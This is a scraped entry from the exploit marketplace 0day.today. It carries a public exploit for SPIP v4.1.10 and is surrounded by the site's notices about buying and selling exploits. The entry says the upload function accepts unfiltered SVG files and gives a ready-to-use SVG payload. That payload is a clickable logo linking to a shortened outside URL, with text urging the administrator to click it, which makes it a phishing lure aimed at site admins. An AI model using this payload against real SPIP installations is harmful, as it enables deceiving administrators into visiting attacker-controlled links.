0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SPIP v4.1.10 - Spoofing Admin account Vulnerability
## Exploit Title: spip v4.1.10 - Spoofing Admin account ## Author: nu11secur1ty ## Vendor: https://www.spip.net/en_rubrique25.html ## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip ## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/ ## Description: The malicious user can upload a malicious SVG file which file is not filtered by a security function, and he can trick the administrator of this system to check his logo by clicking on him and visiting, maybe a very dangerous URL. Wrong web app website logic, and not well sanitizing upload function. STATUS: HIGH- Vulnerability [+]Exploit: ```SVG <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <defs> <linearGradient id="badgeGradient"> <stop offset="0"/> <stop offset="1"/> </linearGradient> </defs> <g id="heading"> <a xlink:href= "https://rb.gy/74f0y"> <path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4 23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6 18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0 12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C 7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2 0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5 2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9 12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8 18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C 24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6 31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4 29.9,22.3 29.6,22.8 z"/> <!--<text id="label" x="5" y="20" transform = "rotate(-15 10 10)">New</text>--> <text id="title" x="40" y="20">Please click on the logo, to see our design services, on our website, thank you!</text> </a> </g> </svg> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html) ## Time spend: 00:37:00 # 0day.today [2024-07-05] #